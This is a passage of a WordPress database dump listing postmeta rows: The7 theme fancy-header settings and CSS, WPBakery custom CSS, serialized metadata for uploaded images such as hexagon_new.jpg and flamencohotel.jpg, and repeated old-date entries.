(33812,4661,'_dt_teammate_options_vk',''),
(33813,4661,'_dt_teammate_options_foursquare',''),
(33814,4661,'_dt_teammate_options_xing',''),
(33815,4661,'_dt_teammate_options_weibo',''),
(33816,4661,'_dt_teammate_options_odnoklassniki',''),
(33817,4661,'_dt_teammate_options_research-gate',''),
(33818,4661,'_dt_teammate_options_yelp',''),
(33819,4661,'_dt_teammate_options_blogger',''),
(33820,4661,'_dt_teammate_options_soundcloud',''),
(33821,4661,'_dt_teammate_options_viber',''),
(33822,4661,'_dt_teammate_options_whatsapp',''),
(33823,4661,'_dt_teammate_options_reddit',''),
(33824,4661,'_dt_teammate_options_snapchat',''),
(33825,4661,'_dt_teammate_options_telegram',''),
(33826,4661,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33827,4614,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:162;s:6:\"height\";i:214;s:4:\"file\";s:13:\"dr-alaa-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:21:\"dr-alaa-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5312;}}'),
(33828,2082,'_wp_old_date','2023-02-05'),
(33829,2083,'_wp_old_date','2023-02-05'),
(33830,2346,'_wp_old_date','2023-02-05'),
(33831,2348,'_wp_old_date','2023-02-05'),
(33832,2349,'_wp_old_date','2023-02-05'),
(33833,2350,'_wp_old_date','2023-02-05'),
(33834,2351,'_wp_old_date','2023-02-05'),
(33835,2904,'_wp_old_date','2023-02-05'),
(33836,3556,'_wp_old_date','2023-02-05'),
(33837,2084,'_wp_old_date','2023-02-05'),
(33838,2352,'_wp_old_date','2023-02-05'),
(33839,2281,'_wp_old_date','2023-02-05'),
(33840,2353,'_wp_old_date','2023-02-05'),
(33841,2354,'_wp_old_date','2023-02-05'),
(33842,2355,'_wp_old_date','2023-02-05'),
(33843,2282,'_wp_old_date','2023-02-05'),
(33844,2283,'_wp_old_date','2023-02-05'),
(33845,3671,'_wp_old_date','2023-02-05'),
(33846,3645,'_wp_old_date','2023-02-05'),
(33847,2284,'_wp_old_date','2023-02-05'),
(33848,2921,'_wp_old_date','2023-02-05'),
(33849,2285,'_wp_old_date','2023-02-05'),
(33850,2356,'_wp_old_date','2023-02-05'),
(33851,2357,'_wp_old_date','2023-02-05'),
(33852,2359,'_wp_old_date','2023-02-05'),
(33853,2358,'_wp_old_date','2023-02-05'),
(33854,2286,'_wp_old_date','2023-02-05'),
(33856,4701,'_wp_attached_file','2023/06/hexagon_new.jpg'),
(33857,4701,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1328;s:6:\"height\";i:542;s:4:\"file\";s:23:\"2023/06/hexagon_new.jpg\";s:8:\"filesize\";i:32943;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"hexagon_new-300x122.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5391;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"hexagon_new-1024x418.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23808;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"hexagon_new-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3183;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"hexagon_new-768x313.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16561;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"hexagon_new-500x204.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9982;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"hexagon_new-800x327.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:327;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17625;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:24:\"hexagon_new-1280x522.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(33860,4705,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1685609158984{margin-top: 100px !important;}.vc_custom_1685609109195{margin-top: 0px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1686739986286{margin-top: -35px !important;}.vc_custom_1684305185157{margin-top: 40px !important;}.vc_custom_1684969841504{margin-top: 20px !important;}.vc_custom_1686345447550{margin-top: 50px !important;}.vc_custom_1686345389553{margin-top: 50px !important;}.vc_custom_1686345510625{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1686350035719{margin-top: 190px !important;}.vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(33865,4719,'_wp_attached_file','2023/06/ESRI.jpg'),
(33866,4719,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:669;s:6:\"height\";i:247;s:4:\"file\";s:16:\"2023/06/ESRI.jpg\";s:8:\"filesize\";i:18271;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ESRI-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6720;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ESRI-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3709;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"ESRI-500x185.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:185;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12953;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(33867,4725,'_edit_lock','1692119926:1'),
(33868,4726,'_wp_attached_file','2023/06/flamencohotel.jpg'),
(33869,4726,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:420;s:4:\"file\";s:25:\"2023/06/flamencohotel.jpg\";s:8:\"filesize\";i:216037;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"flamencohotel-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18311;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"flamencohotel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9009;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"flamencohotel-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87097;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:25:\"flamencohotel-500x263.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43072;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:10:\"BINTI HOME\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(33878,4725,'_thumbnail_id','4726'),
(33879,4725,'_edit_last','1'),
(33880,4725,'_wpb_vc_js_status','false'),
(33881,4725,'_dt_sidebar_position','disabled'),
(33882,4725,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33883,4725,'_dt_sidebar_hide_on_mobile','0'),
(33884,4725,'_dt_footer_show','1'),
(33885,4725,'_dt_footer_widgetarea_id','sidebar_2'),
(33886,4725,'_dt_footer_hide_on_mobile','0'),
(33887,4725,'_dt_header_title','fancy'),
(33888,4725,'_dt_header_background','normal'),
(33889,4725,'_dt_header_background_below_slideshow','disabled'),
(33890,4725,'_dt_header_transparent_bg_color_scheme','light'),
(33891,4725,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33892,4725,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33893,4725,'_dt_header_transparent_bg_color','#000000'),
(33894,4725,'_dt_header_transparent_bg_opacity','50'),
(33895,4725,'_dt_header_disabled_background','normal'),
(33896,4725,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33897,4725,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33898,4725,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33899,4725,'_dt_header_disabled_transparent_bg_color','#000000'),
(33900,4725,'_dt_header_disabled_transparent_bg_opacity','50'),
(33901,4725,'_dt_page_overrides_top_margin',''),
(33902,4725,'_dt_page_overrides_right_margin',''),
(33903,4725,'_dt_page_overrides_bottom_margin',''),
(33904,4725,'_dt_page_overrides_left_margin',''),
(33905,4725,'_dt_mobile_page_padding_top',''),
(33906,4725,'_dt_mobile_page_padding_right',''),
(33907,4725,'_dt_mobile_page_padding_bottom',''),
(33908,4725,'_dt_mobile_page_padding_left',''),
(33909,4729,'_edit_lock','1687390911:1'),
(33910,4725,'_dt_fancy_header_layout_heading',''),
(33911,4725,'_dt_fancy_header_title_aligment','center'),
(33912,4725,'_dt_fancy_header_height','300'),
(33913,4725,'_dt_fancy_header_padding-top','0px'),
(33914,4725,'_dt_fancy_header_padding-bottom','0px'),
(33915,4725,'_dt_fancy_header_breadcrumbs_heading',''),
(33916,4725,'_dt_fancy_header_breadcrumbs','enabled'),
(33917,4725,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33918,4725,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33919,4725,'_dt_fancy_header_title_heading',''),
(33920,4725,'_dt_fancy_header_title_mode','custom'),
(33921,4725,'_dt_fancy_header_title',''),
(33922,4725,'_dt_fancy_header_title_font_size','30'),
(33923,4725,'_dt_fancy_header_title_line_height','36'),
(33924,4725,'_dt_fancy_header_text_transform','none'),
(33925,4725,'_dt_fancy_header_title_color_mode','color'),
(33926,4725,'_dt_fancy_header_title_color','#ffffff'),
(33927,4725,'_dt_fancy_header_subtitle_heading',''),
(33928,4725,'_dt_fancy_header_subtitle',''),
(33929,4725,'_dt_fancy_header_subtitle_font_size','18'),
(33930,4725,'_dt_fancy_header_subtitle_line_height','26'),
(33931,4725,'_dt_fancy_header_subtitle_text_transform','none'),
(33932,4725,'_dt_fancy_header_subtitle_color_mode','color'),
(33933,4725,'_dt_fancy_header_subtitle_color','#ffffff'),
(33934,4725,'_dt_fancy_header_bg_heading',''),
(33935,4725,'_dt_fancy_header_bg_color','#222222'),
(33936,4725,'_dt_fancy_header_bg_image_origin','custom'),
(33937,4725,'_dt_fancy_header_bg_image','a:0:{}'),
(33938,4725,'_dt_fancy_header_bg_repeat','no-repeat'),
(33939,4725,'_dt_fancy_header_bg_position_x','center'),
(33940,4725,'_dt_fancy_header_bg_position_y','center'),
(33941,4725,'_dt_fancy_header_bg_fullscreen','1'),
(33942,4725,'_dt_fancy_header_bg_overlay','0'),
(33943,4725,'_dt_fancy_header_overlay_color','#000'),
(33944,4725,'_dt_fancy_header_bg_overlay_opacity','50'),
(33945,4725,'_dt_fancy_header_scroll_effect','default'),
(33946,4725,'_dt_fancy_header_bg_parallax','0.5'),
(33947,4725,'_dt_fancy_header_responsiveness_heading',''),
(33948,4725,'_dt_fancy_header_responsiveness','enabled'),
(33949,4725,'_dt_fancy_header_responsiveness_switch','778px'),
(33950,4725,'_dt_fancy_header_responsive_height','70'),
(33951,4725,'_dt_fancy_header_responsive_font_size','30'),
(33952,4725,'_dt_fancy_header_responsive_title_line_height','38'),
(33953,4725,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33954,4725,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33955,4725,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33956,4725,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33957,4730,'_wp_attached_file','2023/06/NoVOTE.jpg'),
(33958,4730,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:18:\"2023/06/NoVOTE.jpg\";s:8:\"filesize\";i:92574;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"NoVOTE-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14031;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"NoVOTE-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6045;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"NoVOTE-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65456;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"NoVOTE-500x375.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32143;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"NoVOTE-800x600.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69374;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(33967,4729,'_thumbnail_id','4730'),
(33968,4729,'_edit_last','1'),
(33969,4729,'_wpb_vc_js_status','false'),
(33970,4729,'_dt_sidebar_position','disabled'),
(33971,4729,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33972,4729,'_dt_sidebar_hide_on_mobile','0'),
(33973,4729,'_dt_footer_show','1'),
(33974,4729,'_dt_footer_widgetarea_id','sidebar_2'),
(33975,4729,'_dt_footer_hide_on_mobile','0'),
(33976,4729,'_dt_header_title','fancy'),
(33977,4729,'_dt_header_background','normal'),
(33978,4729,'_dt_header_background_below_slideshow','disabled'),
(33979,4729,'_dt_header_transparent_bg_color_scheme','light'),
(33980,4729,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33981,4729,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33982,4729,'_dt_header_transparent_bg_color','#000000'),
(33983,4729,'_dt_header_transparent_bg_opacity','50'),
(33984,4729,'_dt_header_disabled_background','normal'),
(33985,4729,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33986,4729,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33987,4729,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33988,4729,'_dt_header_disabled_transparent_bg_color','#000000'),
(33989,4729,'_dt_header_disabled_transparent_bg_opacity','50'),
(33990,4729,'_dt_page_overrides_top_margin',''),
(33991,4729,'_dt_page_overrides_right_margin',''),
(33992,4729,'_dt_page_overrides_bottom_margin',''),
(33993,4729,'_dt_page_overrides_left_margin',''),
(33994,4729,'_dt_mobile_page_padding_top',''),
(33995,4729,'_dt_mobile_page_padding_right',''),
(33996,4729,'_dt_mobile_page_padding_bottom',''),
(33997,4729,'_dt_mobile_page_padding_left',''),
(33998,4729,'_dt_fancy_header_layout_heading',''),
(33999,4729,'_dt_fancy_header_title_aligment','center'),
(34000,4729,'_dt_fancy_header_height','300'),
(34001,4729,'_dt_fancy_header_padding-top','0px'),
(34002,4729,'_dt_fancy_header_padding-bottom','0px'),
(34003,4729,'_dt_fancy_header_breadcrumbs_heading',''),
(34004,4729,'_dt_fancy_header_breadcrumbs','disabled'),
(34005,4729,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(34006,4729,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(34007,4729,'_dt_fancy_header_title_heading',''),
(34008,4729,'_dt_fancy_header_title_mode','generic'),
(34009,4729,'_dt_fancy_header_title',''),
(34010,4729,'_dt_fancy_header_title_font_size','30'),
(34011,4729,'_dt_fancy_header_title_line_height','36'),
(34012,4729,'_dt_fancy_header_text_transform','none'),
(34013,4729,'_dt_fancy_header_title_color_mode','color'),
(34014,4729,'_dt_fancy_header_title_color','#ffffff'),
(34015,4729,'_dt_fancy_header_subtitle_heading',''),
(34016,4729,'_dt_fancy_header_subtitle',''),
(34017,4729,'_dt_fancy_header_subtitle_font_size','18'),
(34018,4729,'_dt_fancy_header_subtitle_line_height','26'),
(34019,4729,'_dt_fancy_header_subtitle_text_transform','none'),
(34020,4729,'_dt_fancy_header_subtitle_color_mode','color'),
(34021,4729,'_dt_fancy_header_subtitle_color','#ffffff'),
(34022,4729,'_dt_fancy_header_bg_heading',''),
(34023,4729,'_dt_fancy_header_bg_color','#222222'),
(34024,4729,'_dt_fancy_header_bg_image_origin','custom'),
(34025,4729,'_dt_fancy_header_bg_image','a:0:{}'),
(34026,4729,'_dt_fancy_header_bg_repeat','no-repeat'),
(34027,4729,'_dt_fancy_header_bg_position_x','center'),
(34028,4729,'_dt_fancy_header_bg_position_y','center'),
(34029,4729,'_dt_fancy_header_bg_fullscreen','1'),
(34030,4729,'_dt_fancy_header_bg_overlay','0'),
(34031,4729,'_dt_fancy_header_overlay_color','#000'),
(34032,4729,'_dt_fancy_header_bg_overlay_opacity','50'),
(34033,4729,'_dt_fancy_header_scroll_effect','default'),
(34034,4729,'_dt_fancy_header_bg_parallax','0.5'),
(34035,4729,'_dt_fancy_header_responsiveness_heading',''),
(34036,4729,'_dt_fancy_header_responsiveness','disabled'),
(34037,4729,'_dt_fancy_header_responsiveness_switch','778px'),
(34038,4729,'_dt_fancy_header_responsive_height','70'),
(34039,4729,'_dt_fancy_header_responsive_font_size','30'),
(34040,4729,'_dt_fancy_header_responsive_title_line_height','38'),
(34041,4729,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(34042,4729,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(34043,4729,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(34044,4729,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(34045,2082,'_wp_old_date','2023-06-13'),
(34046,2083,'_wp_old_date','2023-06-13'),
(34047,2346,'_wp_old_date','2023-06-13'),
(34048,2348,'_wp_old_date','2023-06-13'),
(34049,2349,'_wp_old_date','2023-06-13'),
(34050,2350,'_wp_old_date','2023-06-13'),
(34051,2351,'_wp_old_date','2023-06-13'),
(34052,2904,'_wp_old_date','2023-06-13'),
(34053,3556,'_wp_old_date','2023-06-13'),
(34054,2084,'_wp_old_date','2023-06-13'),
(34055,2352,'_wp_old_date','2023-06-13'),
(34056,2281,'_wp_old_date','2023-06-13'),
(34057,2353,'_wp_old_date','2023-06-13'),
(34058,2354,'_wp_old_date','2023-06-13'),
(34059,2355,'_wp_old_date','2023-06-13'),
(34060,2282,'_wp_old_date','2023-06-13'),
(34061,2283,'_wp_old_date','2023-06-13'),
(34062,3671,'_wp_old_date','2023-06-13'),
(34063,3645,'_wp_old_date','2023-06-13'),
(34064,2284,'_wp_old_date','2023-06-13'),
(34065,2921,'_wp_old_date','2023-06-13'),
(34066,2285,'_wp_old_date','2023-06-13'),
(34067,2356,'_wp_old_date','2023-06-13'),
(34068,2357,'_wp_old_date','2023-06-13'),
(34069,2359,'_wp_old_date','2023-06-13'),
(34070,2358,'_wp_old_date','2023-06-13'),
(34071,2286,'_wp_old_date','2023-06-13'),
(34081,4741,'_wp_attached_file','2023/06/Picture1.png'),
